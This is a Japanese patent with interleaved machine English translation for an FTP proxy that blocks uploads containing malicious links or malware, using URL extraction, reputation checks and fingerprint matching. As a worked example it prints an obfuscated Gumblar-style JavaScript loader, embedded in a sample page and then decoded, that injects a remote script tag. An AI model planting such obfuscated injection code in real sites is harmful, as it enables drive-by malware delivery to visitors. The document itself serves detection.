そして、マルウェア等を検出しない処理である図9の処理では、バイナリ形式である場合(ステップS3:バイナリ形式)には、ステップS16の処理、すなわち正規FTPサーバファイルへファイル転送を行なっているが、マルウェア等を検出する場合については、ステップS21〜ステップS24までの処理を行うものである。 Then, in the process of FIG. 9 is a process that does not detect malware, etc., when a binary format: (step S3 in binary format), the processing in step S16, i.e., although a file transfer operations to legitimate FTP server file, for the case of detecting malware, etc., and it performs the processing from step S21~ step S24.

つまり、バイナリ形式である場合(ステップS3:バイナリ形式)には、ステップS21でファイルの電子指紋を取得する。 That is, if a binary format: The (step S3 binary format), to obtain the fingerprint of the file in Step S21. ここでは可読でないファイルに対して電子指紋を計算する。 Here, to calculate the electronic fingerprint against not a readable file. 形式としては、電子指紋データベースDB3で採用されているハッシュ形式を用いる。 The format uses a hashed form which is employed in the fingerprint database DB3.
そして、取得した電子指紋について、ステップS22でマルウェアの電子指紋データベースDB3に格納されている電子指紋と照合をする。 Then, the acquired fingerprint, the fingerprint and the collation stored in the fingerprint database DB3 malware at step S22.
ステップS22で照合したときに、一致する電子指紋が存在しない場合(ステップS23:No)、ステップS16で正規FTPサーバファイルへファイルを転送した後で、ステップS17でページ名と内包URLをURL格納データベースDB1に格納して、終了する。 When checking in step S22, if the fingerprint matching is not present (step S23: No), after transmitting the file to the regular FTP server file in step S16, URL storage database page name included URL in step S17 and stored in DB1, to the end.
ステップS22で照合したときに、一致する電子指紋が存在した場合(ステップS23:Yes)、そのファイルはマルウェアであり、ステップS24でFTPエラーを応答し、終了する。 When checking in step S22, if the fingerprint matching is present (step S23: Yes), the file is malware, the FTP error response in step S24, and ends.

不正コンテンツの発見後の動作として、不正コンテンツと判定しアップロードの中止を行った場合、FTP接続を中断する。 If you as an operation after the discovery of the illegal content, were carried out to stop the upload is determined that the illegal content, interrupting the FTP connection. また、その後のFTP接続は一定期間(1日程度を想定)許可しない。 In addition, subsequent FTP connection (assumed to be about 1 day) a certain period of time does not allow.
さらに、本実施形態では、不正コンテンツの記録を行う。 Furthermore, in the present embodiment, the recording of illegal content. ここでは一定期間、アップロードが試みられた不正コンテンツを保管しておく。 In this period of time, keep a illegal content upload was attempted. ただし、保管左記の最大容量を超える場合、古いものから削除される。 However, if it exceeds the maximum capacity of storage left, it is removed from the old ones.

FTPエラーの応答として、不正コンテンツと判定しアップロードの中止を行った場合、結果通知を行うが、結果をメールにて顧客側の管理者とエンドユーザに通知する。 As a response to the FTP error, in the case of performing the discontinuation of the upload it is determined that the illegal content, the results carry out the notification, but to notify the results to the customer administrators and end users of by e-mail. 顧客側の管理者のメールアドレスはICDの設定ファイルにて指定する。 Administrator's e-mail address of the customer side is specified in the configuration file of the ICD. エンドユーザのメールアドレスは顧客側のLDAPサーバから取得する。 E-mail address of the end user is obtained from the LDAP server of the customer side.

顧客側のエンドユーザのFTP IDやメールIDなどのアカウント管理を行っているシステムと連携し、検知時のメール連絡をエンドユーザのメールアドレスに送信することも可能である。 In cooperation with the system that is doing account management, such as FTP ID and e-mail ID of the customer side of the end user, it is also possible to send an e-mail connection at the time of detection to the end user's e-mail address. この場合には、FTP IDに対応するメールIDが一意に判別できることが前提となる。 In this case, it is assumed that the mail ID corresponding to the FTP ID can be determined uniquely. データ連携はデフォルトではLDAPを想定しているが、これに限るものではない。 Although data linkage by default is assumed to LDAP, the present invention is not limited to this.

次に、レポートメールの例として、FTPアップロード検査の実行結果を示す。 Next, as an example of a report e-mail, indicating the execution result of the FTP upload inspection.
■検知内容 不正リンクの検出 検出内容: ■ detection detection contents of the detection content unauthorized link:
http://URL名/FILE名 ※上記URLは、リンクを誤って参照しないよう、http://を全角文字で記載している。 http: // URL name / FILE name ※ The above URL is, so as not to see the wrong link, http: describes a // double-byte characters.
■検査対象のID ■ ID of the inspection target
FTP ID: foo FTP ID: foo
■検査対象ファイル test. ■ inspected file test. html html
■アップロードに使用されたIPアドレス XXX. ■ IP address XXX, which is used to upload. XXX. XXX. XXX. XXX. XXX XXX
■検知時間 2010/03/15 13:20:15 ■ detection time 2010/03/15 13:20:15

次に、より具体的な通知メールの例を以下に示す。 Next, an example of a more specific notification email below.

件名:[○○○○:20100415−104856]不正リンク検出連絡−−−− Subject: [○○○○: 20100415-104856] Incorrect link detection Contact ----
○○○○○○○○サービスをご利用いただきまして誠にありがとうございます。 ○○○○○○○○ Thank you very much for your use of the service.
不正ファイルを検出し、アップロードを中止しましたので報告いたします。 To detect illegal file, we will report that it has to stop the upload.

■検出日時 2010年4月15日 10時48分56秒 ■ detection date and time April 15, 2010 10:00 48 minutes 56 seconds

■対象ファイル名 x. ■ target file name x. html html

■送信元IPアドレス 192.168.0. ■ source IP address 192.168.0. ××× ×××

■アカウント名 △△△ ■ account name △△△

■アップロード先FTPサーバ 10.10.0. ■ upload destination FTP server 10.10.0. ×××:21 ×××: 21

■不正スクリプト 転送先 検出数 1 個 検出サイト名: ■ unauthorized script transfer destination detection number one detection site name:
script. script. example. example. cn cn

■不正リンク 転送先 検出数 0 個 検出サイト名: ■ unauthorized link transfer destination detection number zero detection site name:
なし None

■不正リダイレクト 転送先 検出数 0 個 検出サイト名: ■ illegal redirect destination detection number zero detection site name:
なし None

■ご注意点本メールは○○○○○○○○サービスシステムが自動的に作成しています。 ■ Please note this email is automatically created ○○○○○○○○ service system.

■○○○○○○○○サービスに関するお問い合わせご不明な点や問題点がございましたら、下記までお問い合わせください。 ■ If you have any inquiries any questions or problems related to ○○○○○○○○ service, please contact the following.

--------------------------------------------- ---------------------------------------------
株式会社○○○○ Co., Ltd. ○○○○
TEL TEL
受付時間(平日10:00 - 12:00 / 13:00 - Hours (weekdays 10:00 to 12:00 / 13:00 -
17:00) 17:00)
E-mail:・・・・・@・・・.jp E-mail: ····· @ ··· .jp
--------------------------------------------- ---------------------------------------------

次に、FTPアップロード検査の実行について、例を挙げて説明する。 Next, the execution of the FTP upload test will be described by way of example.
例えば、Gumblarの難読化例(一重下線部分が難読化されている部分・左記一重下線部分の間の「<3cs…<3e」の部分はscriptタグとURLを難読化した部分)。 For example, (part of "<3cs ... <3e" is obfuscated script tags and URL portion between portions, left single underlined portion singlet underlined are obfuscated) obfuscation example Gumblar.
(function(t){eval(unescape((i='va<72<20<61<3d<22S<63<72ipt<45<6egin<65<22<2cb<3d<22Ver<73<69o<6e()+<22<2c<6a<3d<22<22<2c<75<3dnav<69gato<72<2euse<72A<67e<6e<74<3b<69f((<75<2e<69ndex<4ff(<22W<69n<22)<3e0<29<26<26<28u<2einde<78O<66(<22N<54<206<22)<3c<30)<26<26(docume<6et<2ecook<69e<2eindexOf<28<22miek<3d<31<22)<3c0)<26<26(t<79pe<6ff(zr<76zt<73)<21<3d<74yp<65o<66<28<22A<22))<29<7bzr<76zts<3d<22A<22<3beval<28<22if(wi<6ed<6fw<2e<22+a+<22<29j<3dj+<22+a+<22<4dajo<72<22+b+a+<22Mino<72<22+b+a+<22B<75i<6c<64<22+b<2b<22j<3b<22)<3bd<6f<63um<65<6et<2ewri<74e(<22<3cs<63r<69pt<20s<72c<3d<2f<2f<73<2e<62<62<73<65<63<2e<63o<2e<6ap<2furlt<65<73t<2fh<65llo<2e<6a<73<3e<3c<5c<2fscript<3e<22)<3b<7d').replace(t,'%')))})(/</g); (Function (t) {eval (unescape ((i = 'va <72 <20 <61 <3d <22S <63 <72ipt <45 <6egin <65 <22 <2cb <3d <22Ver <73 <69o <6e ( ) + <22 <2c <6a <3d <22 <22 <2c <75 <3dnav <69gato <72 <2euse <72A <67e <6e <74 <3b <69f ((<75 <2e <69ndex <4ff (< 22W <69n <22) <3e0 <29 <26 <26 <28u <2einde <78O <66 (<22N <54 <206 <22) <3c <30) <26 <26 (docume <6et <2ecook <69e < 2eindexOf <28 <22miek <3d <31 <22) <3c0) <26 <26 (t <79pe <6ff (zr <76zt <73) <21 <3d <74yp <65o <66 <28 <22A <22)) <29 <7bzr <76zts <3d <22A <22 <3beval <28 <22if (wi <6ed <6fw <2e <22 + a + <22 <29j <3dj + <22 + a + <22 <4dajo <72 <22 + b + a + <22Mino <72 <22 + b + a + <22B <75i <6c <64 <22 + b <2b <22j <3b <22) <3bd <6f <63um <65 <6et <2ewri <74e (<22 <3cs <63r <69pt <20s <72c <3d <2f <2f <73 <2e <62 <62 <73 <65 <63 <2e <63o <2e <6ap <2furlt <65 <73t <2fh <65llo <2e <6a <73 <3e <3c <5c <2fscript <3e <22) <3b <7d ') replace (t,.'% ')))}) (/ </ g);

一重下線部分を解読した内容(読みやすくするため、空白や改行を追加したもの・下線付きの箇所が転送先のスクリプトファイルを指定するURL)の例。 Example of the contents of decoding the single underlined portion (URL for readability, the place with spaces or those you add a new line, underlined to specify the destination of the script file).

vara="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; vara = "ScriptEngine", b = "Version () +", j = "", u = navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<scriptsrc=//s.bbsec.co.jp/urltest/hello.js><\/script>");} if ((u.indexOf ( "Win")> 0) && (u.indexOf ( "NT6") <0) && (document.cookie.indexOf ( "miek = 1") <0) && (typeof (zrvzts) ! = typeof ( "A"))) {zrvzts = "A"; eval ( ". if (window" + a + ") j = j +" + a + "Major" + b + a + "Minor" + b + a + " Build "+ b +" j; "); document.write (" <scriptsrc = // s.bbsec.co.jp/urltest/hello.js> <\ / script> ");}
上記の例は、例示のため下線部を変更している(実際にはGumblarのサイトのスクリプトのURL)。 The above example, (URL site scripts Gumblar actually) underlined portion is changed for illustration.

以下では、不正サイトへの誘導を含むコンテンツ(JavaScript内に含むケース)を例に、不正サイト誘導の解析をして、URL抽出の事例を示している。 In the following, an example content (case included within JavaScript) including the induction of the illegal site, the analysis of malicious site induction shows examples of URL extraction.

◎不正サイトへの誘導を含むコンテンツ(JavaScript内に含むケース) ◎ content, including the induction of the illegal site (case to be included within the JavaScript)
<html> <Html>
<head> <Head>
<meta http-equiv="content-type" content="text/html; charset=EUC-JP"> <Meta http-equiv = "content-type" content = "text / html; charset = EUC-JP">
<title>TEST page</title> <Title> TEST page </ title>
</head> </ Head>
<body> <Body>
<script language=JavaScript><!-- <Script language = JavaScript> <! -
(function(t){eval(unescape((i='va<72<20<61<3d<22S<63<72ipt<45<6egin<65<22<2cb<3d<22Ver<73<69o<6e()+<22<2c<6a<3d<22<22<2c<75<3dnav<69gato<72<2euse<72A<67e<6e<74<3b<69f((<75<2e<69ndex<4ff(<22W<69n<22)<3e0<29<26<26<28u<2einde<78O<66(<22N<54<206<22)<3c<30)<26<26(docume<6et<2ecook<69e<2eindexOf<28<22miek<3d<31<22)<3c0)<26<26(t<79pe<6ff(zr<76zt<73)<21<3d<74yp<65o<66<28<22A<22))<29<7bzr<76zts<3d<22A<22<3beval<28<22if(wi<6ed<6fw<2e<22+a+<22<29j<3dj+<22+a+<22<4dajo<72<22+b+a+<22Mino<72<22+b+a+<22B<75i<6c<64<22+b<2b<22j<3b<22)<3bd<6f<63um<65<6et<2ewri<74e(<22<3cs<63r<69pt<20s<72c<3d<2f<2ft<65<73<74<30<30<2e<78<78<78<2e<62<62<73<65<63<2e<63o<2e<6ap:<38<30<38<30<2furlt<65<73t<2fh<65llo<2e<6a<73<3e<3c<5c<2fscript<3e<22)<3b<7d').replace(t,'%')))})(/</g); (Function (t) {eval (unescape ((i = 'va <72 <20 <61 <3d <22S <63 <72ipt <45 <6egin <65 <22 <2cb <3d <22Ver <73 <69o <6e ( ) + <22 <2c <6a <3d <22 <22 <2c <75 <3dnav <69gato <72 <2euse <72A <67e <6e <74 <3b <69f ((<75 <2e <69ndex <4ff (< 22W <69n <22) <3e0 <29 <26 <26 <28u <2einde <78O <66 (<22N <54 <206 <22) <3c <30) <26 <26 (docume <6et <2ecook <69e < 2eindexOf <28 <22miek <3d <31 <22) <3c0) <26 <26 (t <79pe <6ff (zr <76zt <73) <21 <3d <74yp <65o <66 <28 <22A <22)) <29 <7bzr <76zts <3d <22A <22 <3beval <28 <22if (wi <6ed <6fw <2e <22 + a + <22 <29j <3dj + <22 + a + <22 <4dajo <72 <22 + b + a + <22Mino <72 <22 + b + a + <22B <75i <6c <64 <22 + b <2b <22j <3b <22) <3bd <6f <63um <65 <6et <2ewri <74e (<22 <3cs <63r <69pt <20s <72c <3d <2f <2ft <65 <73 <74 <30 <30 <2e <78 <78 <78 <2e <62 <62 <73 <65 <63 <2e <63o <2e <6ap:. <38 <30 <38 <30 <2furlt <65 <73t <2fh <65llo <2e <6a <73 <3e <3c <5c <2fscript <3e <22) <3b <7d ') replace (t, '%')))}) (/ </ g);
--></script> -> </ script>
<h1>TEST page 009</h1> <H1> TEST page 009 </ h1>
<p> <P>
このページは、test用のページです。 This page is a page for the test. <br> <br>
Page ID = 009<br> Page ID = 009 <br>
<a href="/urltest/index.html"> index </a><br> <a href="/urltest/index.html"> index </a> <br>
</body> </ Body>
</html> </ Html>

◎上記のJavaScriptの構文解析を実施した例。 ◎ example was carried out the syntax analysis of the above JavaScript.
・JavaScriptプログラム · JavaScript program
(function(t){eval(unescape((i='va<72<20<61<3d<22S<63<72ipt<45<6egin<65<22<2cb<3d<22Ver<73<69o<6e()+<22<2c<6a<3d<22<22<2c<75<3dnav<69gato<72<2euse<72A<67e<6e<74<3b<69f((<75<2e<69ndex<4ff(<22W<69n<22)<3e0<29<26<26<28u<2einde<78O<66(<22N<54<206<22)<3c<30)<26<26(docume<6et<2ecook<69e<2eindexOf<28<22miek<3d<31<22)<3c0)<26<26(t<79pe<6ff(zr<76zt<73)<21<3d<74yp<65o<66<28<22A<22))<29<7bzr<76zts<3d<22A<22<3beval<28<22if(wi<6ed<6fw<2e<22+a+<22<29j<3dj+<22+a+<22<4dajo<72<22+b+a+<22Mino<72<22+b+a+<22B<75i<6c<64<22+b<2b<22j<3b<22)<3bd<6f<63um<65<6et<2ewri<74e(<22<3cs<63r<69pt<20s<72c<3d<2f<2ft<65<73<74<30<30<2e<78<78<78<2e<62<62<73<65<63<2e<63o<2e<6ap:<38<30<38<30<2furlt<65<73t<2fh<65llo<2e<6a<73<3e<3c<5c<2fscript<3e<22)<3b<7d').replace(t,'%')))})(/</g); (Function (t) {eval (unescape ((i = 'va <72 <20 <61 <3d <22S <63 <72ipt <45 <6egin <65 <22 <2cb <3d <22Ver <73 <69o <6e ( ) + <22 <2c <6a <3d <22 <22 <2c <75 <3dnav <69gato <72 <2euse <72A <67e <6e <74 <3b <69f ((<75 <2e <69ndex <4ff (< 22W <69n <22) <3e0 <29 <26 <26 <28u <2einde <78O <66 (<22N <54 <206 <22) <3c <30) <26 <26 (docume <6et <2ecook <69e < 2eindexOf <28 <22miek <3d <31 <22) <3c0) <26 <26 (t <79pe <6ff (zr <76zt <73) <21 <3d <74yp <65o <66 <28 <22A <22)) <29 <7bzr <76zts <3d <22A <22 <3beval <28 <22if (wi <6ed <6fw <2e <22 + a + <22 <29j <3dj + <22 + a + <22 <4dajo <72 <22 + b + a + <22Mino <72 <22 + b + a + <22B <75i <6c <64 <22 + b <2b <22j <3b <22) <3bd <6f <63um <65 <6et <2ewri <74e (<22 <3cs <63r <69pt <20s <72c <3d <2f <2ft <65 <73 <74 <30 <30 <2e <78 <78 <78 <2e <62 <62 <73 <65 <63 <2e <63o <2e <6ap:. <38 <30 <38 <30 <2furlt <65 <73t <2fh <65llo <2e <6a <73 <3e <3c <5c <2fscript <3e <22) <3b <7d ') replace (t, '%')))}) (/ </ g);

◎構文解析結果 ◎ syntax analysis result
vara="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script vara = "ScriptEngine", b = "Version () +", j = "", u = navigator.userAgent; if ((u.indexOf ( "Win")> 0) && (u.indexOf ( "NT6") <0) && (document.cookie.indexOf ( "miek = 1") <0) && (typeof (zrvzts) = typeof ( "A"))) {zrvzts = "A";! eval ( "if (window. "+ a +") j = j + "+ a +" Major "+ b + a +" Minor "+ b + a +" Build "+ b +" j; "); document.write (" <script
src=//test00.xxx.bbsec.co.jp:8080/urltest/hello.js><\/script>");} src = // test00.xxx.bbsec.co.jp:8080/urltest/hello.js> <\ / script> ");}

◎構文解析結果から script src を抽出 ◎ extract the script src from the syntax analysis result
<script src=//test00.xxx.bbsec.co.jp:8080/urltest/hello.js> <Script src = // test00.xxx.bbsec.co.jp:8080/urltest/hello.js>

◎FQDNを抽出 ◎ extract the FQDN
test00.xxx.bbsec.co.jp test00.xxx.bbsec.co.jp
※上記をブラックリスト、ホワイトリスト、レピュテーション値との照合をする。 Blacklist the above ※, white list, the collation of the reputation value.

なお、本発明で示す検知技術をメールサーバに適用し、HTMLメール上に存在するリンクをチェックすることも可能である。 Incidentally, the detection technique shown in the present invention is applied to the mail server, it is also possible to check the link present on the HTML email.

10 FTPサーバ20 FTPクライアントコンピュータ(ユーザ端末) 10 FTP server 20 FTP client computer (user terminal)
30 FTPプロキシサーバ31 CPU 30 FTP proxy server 31 CPU
32 URL抽出エンジン33 判定エンジン34 電子指紋計算エンジン35 マルウェア判定エンジン36 入力側37 出力側40 システム管理者用コンピュータ50 顧客管理システム用コンピュータ60 インターネット(コンピュータネットワーク) 32 URL extraction engine 33 determines the engine 34 fingerprint calculation engine 35 malware decision engine 36 input 37 output 40 system administrator's computer 50 customer management system computer 60 Internet (computer network)
S ファイルのアップロード遮断システムDB1 URL格納データベースDB2 レピュテーションデータベースDB3 マルウェアの電子指紋データベースBL ブラックリストデータベースWL ホワイトリストデータベース Upload shut-off system DB1 URL stored in database DB2 reputation database DB3 malware of electronic fingerprint database BL black list database WL white list database of S file

Claims (10)

  1. ウェブサーバにファイルをアップロードするためのFTPサーバと、該FTPサーバと接続されたFTPプロキシサーバと、該FTPプロキシサーバと接続されたコンピュータネットワークと、該コンピュータネットワークを介して接続されたクライアントコンピュータと、を備えた、ファイルのアップロード遮断システムであって、 And the FTP server for uploading files to a web server, the FTP proxy server connected with the FTP server, and a computer network connected with the FTP proxy server, and a client computer connected via the computer network, with, a file upload shut-off system,
    前記FTPプロキシサーバは、CPUと、出入力手段と、URL抽出手段と、判定手段と、URLを格納するURL格納手段と、リンク先のサイト名もしくはIPアドレスに対する信頼度を示すレピュテーション値が格納されたレピュテーション手段と、ブラックリスト格納手段と、ホワイトリスト格納手段と、を有し、 The FTP proxy server includes a CPU, a left input means, and a URL extraction unit, a determination unit, a URL storage means for storing URL, reputation value indicating the reliability for the linked site name or IP address is stored It has a reputation unit has a black list storage unit, and white list storage means, and
    前記FTPプロキシサーバの前記判定手段は、ファイルのウェブサーバへのアップロードの可否を判定するものであって、前記URL格納手段と、前記レピュテーション手段と、前記ブラックリスト格納手段と、前記ホワイトリスト格納手段と接続され、 The determination means of the FTP proxy server is for determining whether or not to upload to the file web server, and the URL storage means, and the reputation means, and the black list storage means, the white list storage means It is connected to,
    前記判定手段は、前記URL抽出エンジンにより、アップロードされるファイルに含まれるURL情報を取得し、該取得したURL情報と、少なくとも前記レピュテーション手段、前記ブラックリスト格納手段、前記ホワイトリスト格納手段のいずれかを参照して、前記取得したURLの信頼度情報を得て、該信頼情報をもとにファイルのウェブサーバへのアップロードの可否を判定することを特徴とするファイルのアップロード遮断システム。 It said determination means, by the URL extracting engine, obtains the URL information included in the file to be uploaded, and the acquired URL information, at least the reputation means, the black list storage unit, one of the white-list storage means see, to obtain reliability information of the acquired URL, file upload blocking system, characterized by determining whether or not upload of the trust information to the web server based on the file.
  2. 前記URL情報は、難読化されたスクリプトを複号する処理で得られた情報、符号化されたURL文字列を復号する処理で得られた情報、復号されたURL文字列を分解する処理で得られた情報、前記分解された情報に基づいてホスト名,ポート番号,パス名からなる文字列を生成する処理で得られた情報、前記ホスト名に基づいてIPアドレスを取得する処理で得られた情報のうち少なくとも一つを含むことを特徴とする請求項1に記載のファイルのアップロード遮断システム。 The URL information is obtained by the process of decomposing the information obtained in the process of decoding the obfuscated script, information obtained in the process of decoding the encoded URL string, the decoded URL string the information, host name based on the resolved information, port number, obtained in the process of acquiring the IP address based information obtained in the process of generating a string of the pathname, the host name file upload blocking system according to claim 1, characterized in that it comprises at least one of information.
  3. 前記ファイルのアップロード遮断システムは、さらに電子指紋計算手段と、マルウェア判定手段と、マルウェアの電子指紋が蓄積された電子指紋蓄積手段と、を備え、アップロードされるファイルの電子指紋と、前記電子指紋蓄積手段を対比し、マルウェアを検知することを特徴とする請求項1又は2に記載のファイルのアップロード遮断システム。 Upload isolation system of the file, further a fingerprint calculating unit, and Malware determining means includes a fingerprint storage means for malware fingerprint is stored, and a fingerprint of the file to be uploaded, the fingerprint storage file upload blocking system according to claim 1 or 2 by comparison means, and detecting malware.
  4. 前記判定手段は、前記URL格納手段に格納されたURLに対して定期的に信頼度を検査し、再度公開に足る信頼度を持つかどうかを判定して、書き換えられることを特徴とする請求項1又は2に記載のファイルのアップロード遮断システム。 The determining means, the claims inspected regularly reliability against the URL stored in the URL storage means, to determine whether with a reliability sufficient to republish, characterized in that it is rewritten file upload blocking system according to 1 or 2.
  5. レピュテーション手段は、前記FTPプロキシサーバとネットワークで接続された外部に設けられていることを特徴とする請求項1に記載のファイルのアップロード遮断システム。 Reputation means, file upload blocking system according to claim 1, characterized in that provided outside of said connected by FTP proxy server and the network.
  6. ウェブサーバにファイルをアップロードするためのFTPサーバと、該FTPサーバと接続されたFTPプロキシサーバと、該FTPプロキシサーバと接続されたコンピュータネットワークと、該コンピュータネットワークを介して接続されたクライアントコンピュータと、を備えたシステムにおけるファイルのアップロード遮断方法であって、 And the FTP server for uploading files to a web server, the FTP proxy server connected with the FTP server, and a computer network connected with the FTP proxy server, and a client computer connected via the computer network, a uploading shut down method of the file in a system having a,
    アップロードされるファイルに含まれるURL情報を取得するURL情報取得工程と、 And URL information acquisition step of acquiring the URL information that is included in the file to be uploaded,
    前記URL情報取得工程で取得したURL情報と、該URL情報のリンク先のサイト名もしくはIPアドレスに対する信頼度を格納したレピュテーション手段、ブラックリスト格納手段、ホワイトリスト格納手段の少なくとも一つ以上を参照し判定する参照判定工程と、 Referring the URL information acquired by the URL information obtaining step, reputation means for storing reliability of linked sites name or IP address of the URL information, the black list storage means, at least one or more white list storage unit and determining the reference determination step,
    前記参照判定工程に基づくURLの信頼度情報をもとにそのファイルのウェブサーバへのアップロードの可否を判定する判定工程と、を備えているファイルのアップロード遮断方法。 Upload shut down method of a file and a determination step of determining whether the upload to the web server for the file on the basis of the reliability information of the URL based on the reference judging step.
  7. 前記URL情報取得工程では、難読化されたスクリプトを複号する処理、符号化されたURL文字列を復号する処理、復号されたURL文字列を分解する処理、前記分解された情報に基づいてホスト名,ポート番号,パス名からなる文字列を生成する処理、前記ホスト名に基づいてIPアドレスを取得する処理のうち少なくとも一つの処理がなされることを特徴とする請求項6に記載のファイルのアップロード遮断方法。 In the URL information acquisition step, processing for decoding obfuscated script, processing of decoding the encoded URL string, process decomposes the decoded URL string, based on the resolved information Host name, port number, the process of generating a string of the pathname of the file according to claim 6, characterized in that said at least one processing in the process of acquiring the IP address based on the host name is made upload shut down method.
  8. 前記ファイルのアップロード遮断方法は、前記アップロードされるファイルの電子指紋を取得し、マルウェアの電子指紋が蓄積された電子指紋蓄積データベースを検索することで、マルウェアを検知しアップロードの可否を判定することを特徴とする請求項6又は7に記載のファイルのアップロード遮断方法。 Upload shut down method of the file, retrieves the fingerprint of the file that is the upload by malware fingerprint to search the stored fingerprint storage database, to determine whether the detected malware upload upload shut down method of the file according to claim 6 or 7, characterized.
  9. 前記URL情報取得工程で得られたファイル毎のURLを記録しておくための格納手段への書込み工程と、 A writing process to the storage means for recording the URL of each file obtained by the URL information acquisition step,
    前記URL格納手段に格納されたURLに対して定期的に信頼度を検査し、再度公開に足る信頼度を持つかどうかを判定する再審査の工程と、を備えたことを特徴とする請求項6又は7に記載のファイルのアップロード遮断方法。 Claims, characterized in that the inspected regularly reliability on the stored URL to the URL storage unit, equipped with a reconsideration step of determining whether it has confidence enough to republish upload shut down method of the files described in 6 or 7.
  10. リンク先のサイト名もしくはIPアドレスに対する信頼度の取得を前記FTPプロキシサーバと接続された外部のレピュテーション手段から取得することを特徴とする請求項6に記載のファイルのアップロード遮断方法。 Upload shut down method of the file according to claim 6, characterized in that to obtain the acquisition of confidence in the linked site name or IP address from the FTP proxy server and connected external reputation means.
JP2011073024A 2010-03-31 2011-03-29 Upload shut down method of upload shut-off system and file of the file Active JP5749053B2 (en)

Priority Applications (3)

Application Number Priority Date Filing Date Title
JP2010082548 2010-03-31
JP2010082548 2010-03-31
JP2011073024A JP5749053B2 (en) 2010-03-31 2011-03-29 Upload shut down method of upload shut-off system and file of the file

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
JP2011073024A JP5749053B2 (en) 2010-03-31 2011-03-29 Upload shut down method of upload shut-off system and file of the file

Publications (2)

Publication Number Publication Date
JP2011227884A true JP2011227884A (en) 2011-11-10
JP5749053B2 JP5749053B2 (en) 2015-07-15

Family

ID=45043112

Family Applications (1)

Application Number Title Priority Date Filing Date
JP2011073024A Active JP5749053B2 (en) 2010-03-31 2011-03-29 Upload shut down method of upload shut-off system and file of the file

Country Status (1)

Country Link
JP (1) JP5749053B2 (en)

Cited By (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2014049119A (en) * 2012-09-03 2014-03-17 Naver Corp Double anti-phishing method using toolbar and anti-phishing server
WO2014147923A1 (en) * 2013-03-19 2014-09-25 Necソリューションイノベータ株式会社 Usability-check-result output method, device, and program
JP2015127843A (en) * 2013-11-28 2015-07-09 日本電信電話株式会社 Communication control device, communication control method, and communication control program
JP2016538655A (en) * 2013-09-05 2016-12-08 ナイキ イノベイト シーブイ Upload to use the session implementation and token verifiable proxy uploader of using the capture image data of physical activity
JP2017084139A (en) * 2015-10-28 2017-05-18 株式会社オプティム Terminal management system and terminal management method
US10121065B2 (en) 2013-03-14 2018-11-06 Nike, Inc. Athletic attribute determinations from image data
US10223926B2 (en) 2013-03-14 2019-03-05 Nike, Inc. Skateboard system

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2005070961A (en) * 2003-08-21 2005-03-17 Nippon Telegr & Teleph Corp <Ntt> Web patrol system, web patrol method, program for web patrol, and recording medium for web patrol
JP2005135024A (en) * 2003-10-28 2005-05-26 Kazunori Ando Anti-spam method and anti-spam program
JP2008171415A (en) * 1995-09-26 2008-07-24 Trend Micro Inc Virus detection and removal apparatus for computer network
JP2009069877A (en) * 2007-09-10 2009-04-02 Ntt Communications Kk Information processor, input information control method and program
WO2010002638A2 (en) * 2008-06-30 2010-01-07 Symantec Corporation Simplified communication of a reputation score for an entity
JP2010049473A (en) * 2008-08-21 2010-03-04 Nec Biglobe Ltd Link information extraction device, link information extraction method, and program

Patent Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2008171415A (en) * 1995-09-26 2008-07-24 Trend Micro Inc Virus detection and removal apparatus for computer network
JP2005070961A (en) * 2003-08-21 2005-03-17 Nippon Telegr & Teleph Corp <Ntt> Web patrol system, web patrol method, program for web patrol, and recording medium for web patrol
JP2005135024A (en) * 2003-10-28 2005-05-26 Kazunori Ando Anti-spam method and anti-spam program
JP2009069877A (en) * 2007-09-10 2009-04-02 Ntt Communications Kk Information processor, input information control method and program
WO2010002638A2 (en) * 2008-06-30 2010-01-07 Symantec Corporation Simplified communication of a reputation score for an entity
JP2010049473A (en) * 2008-08-21 2010-03-04 Nec Biglobe Ltd Link information extraction device, link information extraction method, and program

Cited By (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2014049119A (en) * 2012-09-03 2014-03-17 Naver Corp Double anti-phishing method using toolbar and anti-phishing server
US10223926B2 (en) 2013-03-14 2019-03-05 Nike, Inc. Skateboard system
US10121065B2 (en) 2013-03-14 2018-11-06 Nike, Inc. Athletic attribute determinations from image data
JPWO2014147923A1 (en) * 2013-03-19 2017-02-16 Necソリューションイノベータ株式会社 Usability check result output method, apparatus and program
WO2014147923A1 (en) * 2013-03-19 2014-09-25 Necソリューションイノベータ株式会社 Usability-check-result output method, device, and program
JP2016538655A (en) * 2013-09-05 2016-12-08 ナイキ イノベイト シーブイ Upload to use the session implementation and token verifiable proxy uploader of using the capture image data of physical activity
JP2015127843A (en) * 2013-11-28 2015-07-09 日本電信電話株式会社 Communication control device, communication control method, and communication control program
JP2017084139A (en) * 2015-10-28 2017-05-18 株式会社オプティム Terminal management system and terminal management method

Also Published As

Publication number Publication date
JP5749053B2 (en) 2015-07-15

Similar Documents

Publication Publication Date Title
US7096200B2 (en) System and method for evaluating and enhancing source anonymity for encrypted web traffic
JP5329859B2 (en) Method of detecting fraudulent ssl certificate · dns redirection used in pharming, phishing attacks
JP5490708B2 (en) How to computer-implemented systems and filtering
US9794276B2 (en) Protecting against the introduction of alien content
US8286239B1 (en) Identifying and managing web risks
JP5382850B2 (en) Client-side attack against phishing detection
KR101377014B1 (en) System and Method of Malware Diagnosis Mechanism Based on Immune Database
US8095967B2 (en) Secure web site authentication using web site characteristics, secure user credentials and private browser
US7958549B2 (en) Attack defending system and attack defending method
US7634810B2 (en) Phishing detection, prevention, and notification
Chen et al. Online detection and prevention of phishing attacks
US20080034424A1 (en) System and method of preventing web applications threats
